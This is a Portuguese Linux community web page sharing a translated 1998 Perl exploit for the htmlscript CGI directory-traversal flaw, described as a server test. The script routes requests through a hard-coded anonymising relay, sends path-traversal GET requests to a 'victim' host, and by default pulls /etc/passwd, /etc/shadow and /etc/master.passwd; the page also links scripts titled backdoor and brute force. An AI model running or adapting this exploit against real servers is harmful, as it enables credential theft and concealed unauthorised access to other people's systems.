Testando servers a HTMLSCRIPT

Publicado por Douglas Vigliazzi 13/12/2002

[ Hits: 4.698 ]

Download htmlscript.PL

0 0
Denuncie   Favoritos   Indicar  



Este script testa servidores à vulnerabilidade de HTMLSCRIPT, o qual permite a obtenção de qualquer arquivo, inclusive o passwd e shadow.
Esta falha compromete bastante a segurança.

  



Esconder código-fonte

#!/usr/bin/perl -w
#   $Id: htmlscript.pl,v 1.1 1998/01/29 06:28:52 zap Exp $
#
# Obtém /etc/{passwd,shadow,master.passwd} ou qualquer arquivo de servers
# vulneraveis à htmlscript. A requisição HTTP será feita através de um
# roteador anonimo.
#
# Copyright (c) 1998 by zap <zap@arosnet.se>
# Tradução Douglas Vigliazzi e adaptação
# $Log: htmlscript.pl,v $
# Initial revision
#

use strict;
use Socket;

my ($verbose, $onion_router, $onion_port, $onion_timeout, $iaddr, $paddr,
    $proto, $line);

$verbose   = 1;
$onion_router   = "132.250.80.12";
$onion_port   = 9200;
$onion_timeout   = 10;
$iaddr      = inet_aton($onion_router);
$paddr      = sockaddr_in($onion_port, $iaddr);
$proto      = getprotobyname("tcp");

my ($victim, $file) = @ARGV or die "Usar: httpscript.pl <host> [<arquivo>]\n";

sub get_file {
   $SIG{"ALRM"}    = sub { close(ONION); };
   alarm $onion_timeout;
   
   socket(ONION, AF_INET, SOCK_STREAM, $proto);
   select(ONION); $| = 1; select(STDOUT);

   if (connect(ONION, $paddr)) {
      $SIG{"ALRM"} = "IGNORAR";
      print "[ $victim:$file ]\n" if $verbose;
      print ONION "GET http://$victim/cgi-bin/htmlscript?../../../",
             "../../../../..$file\n\n";
      while (defined($line = <ONION>)) { print $line }
   } else {
      die "Erro: Conexão para roteador $onion_router esgotada ",
          " ($onion_timeout\s).\n";
   }
   close(ONION);
}

if ($file) { get_file; } else {
   $file = "/etc/passwd"; get_file;
   $file = "/etc/shadow"; get_file;
   $file = "/etc/master.passwd"; get_file;
}

Scripts recomendados

Nuke de Rwindows

Backdoor em perl

Gerador de senhas aleatórias

Brutal Force Attack

Multi Brute Force


  

Comentários

Nenhum coment�rio foi encontrado.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Servidor de Backup com Ubuntu Server 24.04 LTS, RAID e Duplicati (Dell PowerEdge T420)

Visualizar câmeras IP ONVIF no Linux sem necessidade de instalar aplicativos

Atualizar Debian Online de uma Versão para outra

Máquina perereca - até onde é possível o uso de Linux?

Mitigação - O que é e quando é "seguro" desabilitar

Dicas

Instalar driver Nvidia no Debian 13

Redimensionando, espelhando, convertendo e rotacionando imagens com script

Debian 13 Trixie para Iniciantes

Convertendo pacotes DEB que usam ZSTD (Padrão Novo) para XZ (Padrão Antigo)

Colocando skins no VLC Media Player

Tópicos

Chat GPT (6)

baschrc customizado pegeui vários. (2)

Rust é o "C da nossa geração"? (8)

Ubuntu com problemas no áudio (3)

Montagem em HD externo (1)

Top 10 do mês

Scripts

[Shell Script] Script ligar-scrolllock

[Shell Script] Como ver/ouvir vídeo/áudio via Terminal de modo prático

[Shell Script] Criar Script para apagar determinados arquivos

[Shell Script] inSANE - Script para usar Scanner

[Shell Script] Instalador do emulador de joystick Xbox para joystick generico para PC, PS2, PS3 (Debian e Derivados

A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

Site hospedado por: